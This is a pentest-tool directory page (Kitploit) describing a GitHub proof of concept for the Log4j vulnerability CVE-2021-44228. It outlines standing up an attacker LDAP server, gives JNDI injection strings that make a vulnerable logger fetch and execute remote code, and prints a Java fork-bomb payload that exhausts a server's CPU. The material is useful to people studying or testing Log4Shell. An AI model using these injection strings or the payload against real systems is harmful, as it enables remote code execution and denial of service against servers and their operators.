Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
log4j-exploit-fork-bomb — 💣💥💀 Proof of Concept: пример запуска fork-бомбы на удаленном сервере благодаря уязвимости CVE-2021-44228 | Kitploit
Tools/GitHubGitHub/funcid/log4j-exploit-fork-bomb
Vulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlPayload Development
GitHubfuncid/log4j-exploit-fork-bomb

log4j-exploit-fork-bomb

💣💥💀 Proof of Concept: пример запуска fork-бомбы на удаленном сервере благодаря уязвимости CVE-2021-44228

View Repository
3 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

log4j-exploit-with-fork-bomb

💣💥💀 Proof of Concept: example of launching a fork bomb on a remote server due to vulnerability CVE-2021-44228

  1. Create an attacker's LDAP server (server module) that will serve string and code payloads (payload module)

  2. Create a victim example (victim module) and pass a string to Log4j JRE version <= 6u211, 7u201, 8u191 and 11.0.1

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/anything}
${jndi:ldap://127.0.0.1:1389/jar}
  1. The victim application will receive a byte array from the attacker's server and interpret it as a substituted string or as executable code (parameter com.sun.jndi.ldap.object.trustURLCodebase = true)

  2. For example, the executable code will be a fork bomb (a program that spawns copies of itself consuming all CPU time)

root@kitploit:~
public class ForkBomb {

  public static void main(String... args) {
  
    Runtime.getRuntime().exec(new String[] {
        "javaw", 
        "-cp", 
        System.getProperty("java.class.path"), 
        "ForkBomb"
    });
  }
}
Download Tool